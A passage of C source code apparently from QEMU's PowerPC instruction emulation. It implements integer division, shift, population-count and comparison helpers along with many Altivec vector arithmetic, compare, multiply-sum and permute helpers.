INT64_MIN)))) { #else if (unlikely((divisor == 0) || ((divisor == -1ull) && (dividend == INT64_MIN)))) { #endif overflow = 1; } else { rt = dividend / divisor; overflow = rt != (int32_t)rt; } if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return (target_ulong)rt; } #if defined(TARGET_PPC64) uint64_t helper_divdeu(CPUPPCState *env, uint64_t ra, uint64_t rb, uint32_t oe) { uint64_t rt = 0; int overflow = 0; overflow = divu128(&rt, &ra, rb); if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return rt; } uint64_t helper_divde(CPUPPCState *env, uint64_t rau, uint64_t rbu, uint32_t oe) { int64_t rt = 0; int64_t ra = (int64_t)rau; int64_t rb = (int64_t)rbu; int overflow = divs128(&rt, &ra, rb); if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return rt; } #endif #if defined(TARGET_PPC64) /* if x = 0xab, returns 0xababababababababa */ #define pattern(x) (((x) & 0xff) * (~(target_ulong)0 / 0xff)) /* * subtract 1 from each byte, and with inverse, check if MSB is set at each * byte. * i.e. ((0x00 - 0x01) & ~(0x00)) & 0x80 * (0xFF & 0xFF) & 0x80 = 0x80 (zero found) */ #define haszero(v) (((v) - pattern(0x01)) & ~(v) & pattern(0x80)) /* When you XOR the pattern and there is a match, that byte will be zero */ #define hasvalue(x, n) (haszero((x) ^ pattern(n))) uint32_t helper_cmpeqb(target_ulong ra, target_ulong rb) { return hasvalue(rb, ra) ? CRF_GT : 0; } #undef pattern #undef haszero #undef hasvalue /* * Return a random number. */ uint64_t helper_darn32(void) { uint32_t ret; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { return -1; } return ret; } uint64_t helper_darn64(void) { uint64_t ret; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { return -1; } return ret; } uint64_t helper_bpermd(uint64_t rs, uint64_t rb) { int i; uint64_t ra = 0; for (i = 0; i < 8; i++) { int index = (rs >> (i * 8)) & 0xFF; if (index < 64) { if (rb & PPC_BIT(index)) { ra |= 1ULL << i; } } } return ra; } #endif target_ulong helper_cmpb(target_ulong rs, target_ulong rb) { target_ulong mask = 0xff; target_ulong ra = 0; int i; for (i = 0; i < sizeof(target_ulong); i++) { if ((rs & mask) == (rb & mask)) { ra |= mask; } mask <<= 8; } return ra; } /* shift right arithmetic helper */ target_ulong helper_sraw(CPUPPCState *env, target_ulong value, target_ulong shift) { int32_t ret; if (likely(!(shift & 0x20))) { if (likely((uint32_t)shift != 0)) { shift &= 0x1f; ret = (int32_t)value >> shift; if (likely(ret >= 0 || (value & ((1 << shift) - 1)) == 0)) { env->ca32 = env->ca = 0; } else { env->ca32 = env->ca = 1; } } else { ret = (int32_t)value; env->ca32 = env->ca = 0; } } else { ret = (int32_t)value >> 31; env->ca32 = env->ca = (ret != 0); } return (target_long)ret; } #if defined(TARGET_PPC64) target_ulong helper_srad(CPUPPCState *env, target_ulong value, target_ulong shift) { int64_t ret; if (likely(!(shift & 0x40))) { if (likely((uint64_t)shift != 0)) { shift &= 0x3f; ret = (int64_t)value >> shift; if (likely(ret >= 0 || (value & ((1ULL << shift) - 1)) == 0)) { env->ca32 = env->ca = 0; } else { env->ca32 = env->ca = 1; } } else { ret = (int64_t)value; env->ca32 = env->ca = 0; } } else { ret = (int64_t)value >> 63; env->ca32 = env->ca = (ret != 0); } return ret; } #endif #if defined(TARGET_PPC64) target_ulong helper_popcntb(target_ulong val) { /* Note that we don't fold past bytes */ val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); return val; } target_ulong helper_popcntw(target_ulong val) { /* Note that we don't fold past words. */ val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); val = (val & 0x00ff00ff00ff00ffULL) + ((val >> 8) & 0x00ff00ff00ff00ffULL); val = (val & 0x0000ffff0000ffffULL) + ((val >> 16) & 0x0000ffff0000ffffULL); return val; } #else target_ulong helper_popcntb(target_ulong val) { /* Note that we don't fold past bytes */ val = (val & 0x55555555) + ((val >> 1) & 0x55555555); val = (val & 0x33333333) + ((val >> 2) & 0x33333333); val = (val & 0x0f0f0f0f) + ((val >> 4) & 0x0f0f0f0f); return val; } #endif /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ target_ulong helper_div(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { uint64_t tmp = (uint64_t)arg1 << 32 | env->spr[SPR_MQ]; if (((int32_t)tmp == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->spr[SPR_MQ] = tmp % arg2; return tmp / (int32_t)arg2; } } target_ulong helper_divo(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { uint64_t tmp = (uint64_t)arg1 << 32 | env->spr[SPR_MQ]; if (((int32_t)tmp == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->so = env->ov = 1; env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->spr[SPR_MQ] = tmp % arg2; tmp /= (int32_t)arg2; if ((int32_t)tmp != tmp) { env->so = env->ov = 1; } else { env->ov = 0; } return tmp; } } target_ulong helper_divs(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { if (((int32_t)arg1 == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->spr[SPR_MQ] = (int32_t)arg1 % (int32_t)arg2; return (int32_t)arg1 / (int32_t)arg2; } } target_ulong helper_divso(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { if (((int32_t)arg1 == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->so = env->ov = 1; env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->ov = 0; env->spr[SPR_MQ] = (int32_t)arg1 % (int32_t)arg2; return (int32_t)arg1 / (int32_t)arg2; } } /*****************************************************************************/ /* 602 specific instructions */ /* mfrom is the most crazy instruction ever seen, imho ! */ /* Real implementation uses a ROM table. Do the same */ /* * Extremely decomposed: * -arg / 256 * return 256 * log10(10 + 1.0) + 0.5 */ target_ulong helper_602_mfrom(target_ulong arg) { if (likely(arg < 602)) { #include "mfrom_table.inc.c" return mfrom_ROM_table[arg]; } else { return 0; } } /*****************************************************************************/ /* Altivec extension helpers */ #if defined(HOST_WORDS_BIGENDIAN) #define VECTOR_FOR_INORDER_I(index, element) \ for (index = 0; index < ARRAY_SIZE(r->element); index++) #else #define VECTOR_FOR_INORDER_I(index, element) \ for (index = ARRAY_SIZE(r->element) - 1; index >= 0; index--) #endif /* Saturating arithmetic helpers. */ #define SATCVT(from, to, from_type, to_type, min, max) \ static inline to_type cvt##from##to(from_type x, int *sat) \ { \ to_type r; \ \ if (x < (from_type)min) { \ r = min; \ *sat = 1; \ } else if (x > (from_type)max) { \ r = max; \ *sat = 1; \ } else { \ r = x; \ } \ return r; \ } #define SATCVTU(from, to, from_type, to_type, min, max) \ static inline to_type cvt##from##to(from_type x, int *sat) \ { \ to_type r; \ \ if (x > (from_type)max) { \ r = max; \ *sat = 1; \ } else { \ r = x; \ } \ return r; \ } SATCVT(sh, sb, int16_t, int8_t, INT8_MIN, INT8_MAX) SATCVT(sw, sh, int32_t, int16_t, INT16_MIN, INT16_MAX) SATCVT(sd, sw, int64_t, int32_t, INT32_MIN, INT32_MAX) SATCVTU(uh, ub, uint16_t, uint8_t, 0, UINT8_MAX) SATCVTU(uw, uh, uint32_t, uint16_t, 0, UINT16_MAX) SATCVTU(ud, uw, uint64_t, uint32_t, 0, UINT32_MAX) SATCVT(sh, ub, int16_t, uint8_t, 0, UINT8_MAX) SATCVT(sw, uh, int32_t, uint16_t, 0, UINT16_MAX) SATCVT(sd, uw, int64_t, uint32_t, 0, UINT32_MAX) #undef SATCVT #undef SATCVTU void helper_mtvscr(CPUPPCState *env, uint32_t vscr) { env->vscr = vscr & ~(1u << VSCR_SAT); /* Which bit we set is completely arbitrary, but clear the rest. */ env->vscr_sat.u64[0] = vscr & (1u << VSCR_SAT); env->vscr_sat.u64[1] = 0; set_flush_to_zero((vscr >> VSCR_NJ) & 1, &env->vec_status); } uint32_t helper_mfvscr(CPUPPCState *env) { uint32_t sat = (env->vscr_sat.u64[0] | env->vscr_sat.u64[1]) != 0; return env->vscr | (sat << VSCR_SAT); } static inline void set_vscr_sat(CPUPPCState *env) { /* The choice of non-zero value is arbitrary. */ env->vscr_sat.u32[0] = 1; } void helper_vaddcuw(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { r->u32[i] = ~a->u32[i] < b->u32[i]; } } /* vprtybw */ void helper_vprtybw(ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { uint64_t res = b->u32[i] ^ (b->u32[i] >> 16); res ^= res >> 8; r->u32[i] = res & 1; } } /* vprtybd */ void helper_vprtybd(ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u64); i++) { uint64_t res = b->u64[i] ^ (b->u64[i] >> 32); res ^= res >> 16; res ^= res >> 8; r->u64[i] = res & 1; } } /* vprtybq */ void helper_vprtybq(ppc_avr_t *r, ppc_avr_t *b) { uint64_t res = b->u64[0] ^ b->u64[1]; res ^= res >> 32; res ^= res >> 16; res ^= res >> 8; r->VsrD(1) = res & 1; r->VsrD(0) = 0; } #define VARITH_DO(name, op, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = a->element[i] op b->element[i]; \ } \ } VARITH_DO(muluwm, *, u32) #undef VARITH_DO #undef VARITH #define VARITHFP(suffix, func) \ void helper_v##suffix(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, \ ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ r->f32[i] = func(a->f32[i], b->f32[i], &env->vec_status); \ } \ } VARITHFP(addfp, float32_add) VARITHFP(subfp, float32_sub) VARITHFP(minfp, float32_min) VARITHFP(maxfp, float32_max) #undef VARITHFP #define VARITHFPFMA(suffix, type) \ void helper_v##suffix(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, \ ppc_avr_t *b, ppc_avr_t *c) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ r->f32[i] = float32_muladd(a->f32[i], c->f32[i], b->f32[i], \ type, &env->vec_status); \ } \ } VARITHFPFMA(maddfp, 0); VARITHFPFMA(nmsubfp, float_muladd_negate_result | float_muladd_negate_c); #undef VARITHFPFMA #define VARITHSAT_CASE(type, op, cvt, element) \ { \ type result = (type)a->element[i] op (type)b->element[i]; \ r->element[i] = cvt(result, &sat); \ } #define VARITHSAT_DO(name, op, optype, cvt, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *vscr_sat, \ ppc_avr_t *a, ppc_avr_t *b, uint32_t desc) \ { \ int sat = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ VARITHSAT_CASE(optype, op, cvt, element); \ } \ if (sat) { \ vscr_sat->u32[0] = 1; \ } \ } #define VARITHSAT_SIGNED(suffix, element, optype, cvt) \ VARITHSAT_DO(adds##suffix##s, +, optype, cvt, element) \ VARITHSAT_DO(subs##suffix##s, -, optype, cvt, element) #define VARITHSAT_UNSIGNED(suffix, element, optype, cvt) \ VARITHSAT_DO(addu##suffix##s, +, optype, cvt, element) \ VARITHSAT_DO(subu##suffix##s, -, optype, cvt, element) VARITHSAT_SIGNED(b, s8, int16_t, cvtshsb) VARITHSAT_SIGNED(h, s16, int32_t, cvtswsh) VARITHSAT_SIGNED(w, s32, int64_t, cvtsdsw) VARITHSAT_UNSIGNED(b, u8, uint16_t, cvtshub) VARITHSAT_UNSIGNED(h, u16, uint32_t, cvtswuh) VARITHSAT_UNSIGNED(w, u32, uint64_t, cvtsduw) #undef VARITHSAT_CASE #undef VARITHSAT_DO #undef VARITHSAT_SIGNED #undef VARITHSAT_UNSIGNED #define VAVG_DO(name, element, etype) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ etype x = (etype)a->element[i] + (etype)b->element[i] + 1; \ r->element[i] = x >> 1; \ } \ } #define VAVG(type, signed_element, signed_type, unsigned_element, \ unsigned_type) \ VAVG_DO(avgs##type, signed_element, signed_type) \ VAVG_DO(avgu##type, unsigned_element, unsigned_type) VAVG(b, s8, int16_t, u8, uint16_t) VAVG(h, s16, int32_t, u16, uint32_t) VAVG(w, s32, int64_t, u32, uint64_t) #undef VAVG_DO #undef VAVG #define VABSDU_DO(name, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = (a->element[i] > b->element[i]) ? \ (a->element[i] - b->element[i]) : \ (b->element[i] - a->element[i]); \ } \ } /* * VABSDU - Vector absolute difference unsigned * name - instruction mnemonic suffix (b: byte, h: halfword, w: word) * element - element type to access from vector */ #define VABSDU(type, element) \ VABSDU_DO(absdu##type, element) VABSDU(b, u8) VABSDU(h, u16) VABSDU(w, u32) #undef VABSDU_DO #undef VABSDU #define VCF(suffix, cvt, element) \ void helper_vcf##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *b, uint32_t uim) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ float32 t = cvt(b->element[i], &env->vec_status); \ r->f32[i] = float32_scalbn(t, 0 - uim, &env->vec_status); \ } \ } VCF(ux, uint32_to_float32, u32) VCF(sx, int32_to_float32, s32) #undef VCF #define VCMP_DO(suffix, compare, element, record) \ void helper_vcmp##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ uint64_t ones = (uint64_t)-1; \ uint64_t all = ones; \ uint64_t none = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ uint64_t result = (a->element[i] compare b->element[i] ? \ ones : 0x0); \ switch (sizeof(a->element[0])) { \ case 8: \ r->u64[i] = result; \ break; \ case 4: \ r->u32[i] = result; \ break; \ case 2: \ r->u16[i] = result; \ break; \ case 1: \ r->u8[i] = result; \ break; \ } \ all &= result; \ none |= result; \ } \ if (record) { \ env->crf[6] = ((all != 0) << 3) | ((none == 0) << 1); \ } \ } #define VCMP(suffix, compare, element) \ VCMP_DO(suffix, compare, element, 0) \ VCMP_DO(suffix##_dot, compare, element, 1) VCMP(equb, ==, u8) VCMP(equh, ==, u16) VCMP(equw, ==, u32) VCMP(equd, ==, u64) VCMP(gtub, >, u8) VCMP(gtuh, >, u16) VCMP(gtuw, >, u32) VCMP(gtud, >, u64) VCMP(gtsb, >, s8) VCMP(gtsh, >, s16) VCMP(gtsw, >, s32) VCMP(gtsd, >, s64) #undef VCMP_DO #undef VCMP #define VCMPNE_DO(suffix, element, etype, cmpzero, record) \ void helper_vcmpne##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ etype ones = (etype)-1; \ etype all = ones; \ etype result, none = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ if (cmpzero) { \ result = ((a->element[i] == 0) \ || (b->element[i] == 0) \ || (a->element[i] != b->element[i]) ? \ ones : 0x0); \ } else { \ result = (a->element[i] != b->element[i]) ? ones : 0x0; \ } \ r->element[i] = result; \ all &= result; \ none |= result; \ } \ if (record) { \ env->crf[6] = ((all != 0) << 3) | ((none == 0) << 1); \ } \ } /* * VCMPNEZ - Vector compare not equal to zero * suffix - instruction mnemonic suffix (b: byte, h: halfword, w: word) * element - element type to access from vector */ #define VCMPNE(suffix, element, etype, cmpzero) \ VCMPNE_DO(suffix, element, etype, cmpzero, 0) \ VCMPNE_DO(suffix##_dot, element, etype, cmpzero, 1) VCMPNE(zb, u8, uint8_t, 1) VCMPNE(zh, u16, uint16_t, 1) VCMPNE(zw, u32, uint32_t, 1) VCMPNE(b, u8, uint8_t, 0) VCMPNE(h, u16, uint16_t, 0) VCMPNE(w, u32, uint32_t, 0) #undef VCMPNE_DO #undef VCMPNE #define VCMPFP_DO(suffix, compare, order, record) \ void helper_vcmp##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ uint32_t ones = (uint32_t)-1; \ uint32_t all = ones; \ uint32_t none = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ uint32_t result; \ int rel = float32_compare_quiet(a->f32[i], b->f32[i], \ &env->vec_status); \ if (rel == float_relation_unordered) { \ result = 0; \ } else if (rel compare order) { \ result = ones; \ } else { \ result = 0; \ } \ r->u32[i] = result; \ all &= result; \ none |= result; \ } \ if (record) { \ env->crf[6] = ((all != 0) << 3) | ((none == 0) << 1); \ } \ } #define VCMPFP(suffix, compare, order) \ VCMPFP_DO(suffix, compare, order, 0) \ VCMPFP_DO(suffix##_dot, compare, order, 1) VCMPFP(eqfp, ==, float_relation_equal) VCMPFP(gefp, !=, float_relation_less) VCMPFP(gtfp, ==, float_relation_greater) #undef VCMPFP_DO #undef VCMPFP static inline void vcmpbfp_internal(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, int record) { int i; int all_in = 0; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { int le_rel = float32_compare_quiet(a->f32[i], b->f32[i], &env->vec_status); if (le_rel == float_relation_unordered) { r->u32[i] = 0xc0000000; all_in = 1; } else { float32 bneg = float32_chs(b->f32[i]); int ge_rel = float32_compare_quiet(a->f32[i], bneg, &env->vec_status); int le = le_rel != float_relation_greater; int ge = ge_rel != float_relation_less; r->u32[i] = ((!le) << 31) | ((!ge) << 30); all_in |= (!le | !ge); } } if (record) { env->crf[6] = (all_in == 0) << 1; } } void helper_vcmpbfp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { vcmpbfp_internal(env, r, a, b, 0); } void helper_vcmpbfp_dot(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { vcmpbfp_internal(env, r, a, b, 1); } #define VCT(suffix, satcvt, element) \ void helper_vct##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *b, uint32_t uim) \ { \ int i; \ int sat = 0; \ float_status s = env->vec_status; \ \ set_float_rounding_mode(float_round_to_zero, &s); \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ if (float32_is_any_nan(b->f32[i])) { \ r->element[i] = 0; \ } else { \ float64 t = float32_to_float64(b->f32[i], &s); \ int64_t j; \ \ t = float64_scalbn(t, uim, &s); \ j = float64_to_int64(t, &s); \ r->element[i] = satcvt(j, &sat); \ } \ } \ if (sat) { \ set_vscr_sat(env); \ } \ } VCT(uxs, cvtsduw, u32) VCT(sxs, cvtsdsw, s32) #undef VCT target_ulong helper_vclzlsbb(ppc_avr_t *r) { target_ulong count = 0; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { if (r->VsrB(i) & 0x01) { break; } count++; } return count; } target_ulong helper_vctzlsbb(ppc_avr_t *r) { target_ulong count = 0; int i; for (i = ARRAY_SIZE(r->u8) - 1; i >= 0; i--) { if (r->VsrB(i) & 0x01) { break; } count++; } return count; } void helper_vmhaddshs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int sat = 0; int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { int32_t prod = a->s16[i] * b->s16[i]; int32_t t = (int32_t)c->s16[i] + (prod >> 15); r->s16[i] = cvtswsh(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vmhraddshs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int sat = 0; int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { int32_t prod = a->s16[i] * b->s16[i] + 0x00004000; int32_t t = (int32_t)c->s16[i] + (prod >> 15); r->s16[i] = cvtswsh(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vmladduhm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { int32_t prod = a->s16[i] * b->s16[i]; r->s16[i] = (int16_t) (prod + c->s16[i]); } } #define VMRG_DO(name, element, access, ofs) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ ppc_avr_t result; \ int i, half = ARRAY_SIZE(r->element) / 2; \ \ for (i = 0; i < half; i++) { \ result.access(i * 2 + 0) = a->access(i + ofs); \ result.access(i * 2 + 1) = b->access(i + ofs); \ } \ *r = result; \ } #define VMRG(suffix, element, access) \ VMRG_DO(mrgl##suffix, element, access, half) \ VMRG_DO(mrgh##suffix, element, access, 0) VMRG(b, u8, VsrB) VMRG(h, u16, VsrH) VMRG(w, u32, VsrW) #undef VMRG_DO #undef VMRG void helper_vmsummbm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int32_t prod[16]; int i; for (i = 0; i < ARRAY_SIZE(r->s8); i++) { prod[i] = (int32_t)a->s8[i] * b->u8[i]; } VECTOR_FOR_INORDER_I(i, s32) { r->s32[i] = c->s32[i] + prod[4 * i] + prod[4 * i + 1] + prod[4 * i + 2] + prod[4 * i + 3]; } } void helper_vmsumshm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int32_t prod[8]; int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { prod[i] = a->s16[i] * b->s16[i]; } VECTOR_FOR_INORDER_I(i, s32) { r->s32[i] = c->s32[i] + prod[2 * i] + prod[2 * i + 1]; } } void helper_vmsumshs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int32_t prod[8]; int i; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { prod[i] = (int32_t)a->s16[i] * b->s16[i]; } VECTOR_FOR_INORDER_I(i, s32) { int64_t t = (int64_t)c->s32[i] + prod[2 * i] + prod[2 * i + 1]; r->u32[i] = cvtsdsw(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vmsumubm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { uint16_t prod[16]; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { prod[i] = a->u8[i] * b->u8[i]; } VECTOR_FOR_INORDER_I(i, u32) { r->u32[i] = c->u32[i] + prod[4 * i] + prod[4 * i + 1] + prod[4 * i + 2] + prod[4 * i + 3]; } } void helper_vmsumuhm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { uint32_t prod[8]; int i; for (i = 0; i < ARRAY_SIZE(r->u16); i++) { prod[i] = a->u16[i] * b->u16[i]; } VECTOR_FOR_INORDER_I(i, u32) { r->u32[i] = c->u32[i] + prod[2 * i] + prod[2 * i + 1]; } } void helper_vmsumuhs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { uint32_t prod[8]; int i; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->u16); i++) { prod[i] = a->u16[i] * b->u16[i]; } VECTOR_FOR_INORDER_I(i, s32) { uint64_t t = (uint64_t)c->u32[i] + prod[2 * i] + prod[2 * i + 1]; r->u32[i] = cvtuduw(t, &sat); } if (sat) { set_vscr_sat(env); } } #define VMUL_DO_EVN(name, mul_element, mul_access, prod_access, cast) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->mul_element); i += 2) { \ r->prod_access(i >> 1) = (cast)a->mul_access(i) * \ (cast)b->mul_access(i); \ } \ } #define VMUL_DO_ODD(name, mul_element, mul_access, prod_access, cast) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->mul_element); i += 2) { \ r->prod_access(i >> 1) = (cast)a->mul_access(i + 1) * \ (cast)b->mul_access(i + 1); \ } \ } #define VMUL(suffix, mul_element, mul_access, prod_access, cast) \ VMUL_DO_EVN(mule##suffix, mul_element, mul_access, prod_access, cast) \ VMUL_DO_ODD(mulo##suffix, mul_element, mul_access, prod_access, cast) VMUL(sb, s8, VsrSB, VsrSH, int16_t) VMUL(sh, s16, VsrSH, VsrSW, int32_t) VMUL(sw, s32, VsrSW, VsrSD, int64_t) VMUL(ub, u8, VsrB, VsrH, uint16_t) VMUL(uh, u16, VsrH, VsrW, uint32_t) VMUL(uw, u32, VsrW, VsrD, uint64_t) #undef VMUL_DO_EVN #undef VMUL_DO_ODD #undef VMUL void helper_vperm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { ppc_avr_t result; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int s = c->VsrB(i) & 0x1f; int index = s & 0xf; if (s & 0x10) { result.VsrB(i) = b->VsrB(index); } else { result.VsrB(i) = a->VsrB(index); } } *r = result; } void helper_vpermr(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { ppc_avr_t result; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int s = c->VsrB(i) & 0x1f; int index = 15 - (s & 0xf); if (s & 0x10) { result.VsrB(i) = a->VsrB(index); } else { result.VsrB(i) = b->VsrB(index); } } *r = result; } #if defined(HOST_WORDS_BIGENDIAN) #define VBPERMQ_INDEX(avr, i) ((avr)->u8[(i)]) #define VBPERMD_INDEX(i) (i) #define VBPERMQ_DW(index) (((index) & 0x40) != 0) #define EXTRACT_BIT(avr, i, index) (extract64((avr)->u64[i], index, 1)) #else #define VBPERMQ_INDEX(avr, i) ((avr)->u8[15 - (i)]) #define VBPERMD_INDEX(i) (1 - i) #define VBPERMQ_DW(index) (((index) & 0x40) == 0) #define EXTRACT_BIT(avr, i, index) \ (extract64((avr)->u64[1 - i], 63 - index, 1)) #endif void helper_vbpermd(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; ppc_avr_t result = { .u64 = { 0, 0 } }; VECTOR_FOR_INORDER_I(i, u64) { for (j = 0; j < 8; j++) { int index = VBPERMQ_INDEX(b, (i * 8) + j); if (index < 64 && EXTRACT_BIT(a, i, index)) { result.u64[VBPERMD_INDEX(i)] |= (0x80 >> j); } } } *r = result; } void helper_vbpermq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; uint64_t perm = 0; VECTOR_FOR_INORDER_I(i, u8) { int index = VBPERMQ_INDEX(b, i); if (index < 128) { uint64_t mask = (1ull << (63 - (index & 0x3F))); if (a->u64[VBPERMQ_DW(index)] & mask) { perm |= (0x8000 >> i); } } } r->VsrD(0) = perm; r->VsrD(1) = 0; } #undef VBPERMQ_INDEX #undef VBPERMQ_DW #define PMSUM(name, srcfld, trgfld, trgtyp) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i, j; \ trgtyp prod[sizeof(ppc_avr_t) / sizeof(a->srcfld[0])]; \ \ VECTOR_FOR_INORDER_I(i, srcfld) { \ prod[i] = 0; \ for (j = 0; j < sizeof(a->srcfld[0]) * 8; j++) { \ if (a->srcfld[i] & (1ull << j)) { \ prod[i] ^= ((trgtyp)b->srcfld[i] << j); \ } \ } \ } \ \ VECTOR_FOR_INORDER_I(i, trgfld) { \ r->trgfld[i] = prod[2 * i] ^ prod[2 * i + 1]; \ } \ } PMSUM(vpmsumb, u8, u16, uint16_t) PMSUM(vpmsumh, u16, u32, uint32_t) PMSUM(vpmsumw, u32, u64, uint64_t) void helper_vpmsumd(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 int i, j; __uint128_t prod[2]; VECTOR_FOR_INORDER_I(i, u64) { prod[i] = 0; for (j = 0; j < 64; j++) { if (a->u64[i] & (1ull << j)) { prod[i] ^= (((__uint128_t)b->u64[i]) << j); } } } r->u128 = prod[0] ^ prod[1]; #else int i, j; ppc_avr_t prod[2]; VECTOR_FOR_INORDER_I(i, u64) { prod[i].VsrD(1) = prod[i].VsrD(0) = 0; for (j = 0; j < 64; j++) { if (a->u64[i] & (1ull << j)) { ppc_avr_t bshift; if (j == 0) { bshift.VsrD(0) = 0; bshift.VsrD(1) = b->u64[i]; } else { bshift.VsrD(0) = b->u64[i] >> (64 - j); bshift.VsrD(1) = b->u64[i] << j; } prod[i].VsrD(1) ^= bshift.VsrD(1); prod[i].VsrD(0) ^= bshift.VsrD(0); } } } r->VsrD(1) 